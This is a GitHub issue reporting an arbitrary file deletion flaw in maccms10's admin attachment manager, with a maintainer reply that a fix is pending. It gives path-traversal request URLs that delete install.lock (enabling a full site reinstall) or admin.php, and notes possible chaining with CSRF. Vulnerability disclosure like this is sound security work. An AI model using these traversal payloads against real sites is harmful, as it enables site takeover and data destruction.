Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
In the ""超级控制台->基础->附件管理"", delete function can delete any file, including /application/data/install/install.lock
/application/data/install/install.lock
After the administrator logged in, open the following link.
http://127.0.0.1/maccms10/admin.php/admin/images/del.html?ids%5B%5D=/upload/../application/data/install/install.lock
File install.lock will be deleted
install.lock
Then visit install.php
install.php
This can reinstall the entire site.
delete admin.php
admin.php
http://127.0.0.1/maccms10/admin.php/admin/images/del.html?ids%5B%5D=/upload/../admin.php
In general, it can be used with CSRF vulnerabilities to delete arbitrary files.
The text was updated successfully, but these errors were encountered:
修复~等待发包
Sorry, something went wrong.
No branches or pull requests
In the ""超级控制台->基础->附件管理"", delete function can delete any file, including
/application/data/install/install.lockAfter the administrator logged in, open the following link.
File
install.lockwill be deletedThen visit
install.phpThis can reinstall the entire site.
delete
admin.phpIn general, it can be used with CSRF vulnerabilities to delete arbitrary files.
The text was updated successfully, but these errors were encountered: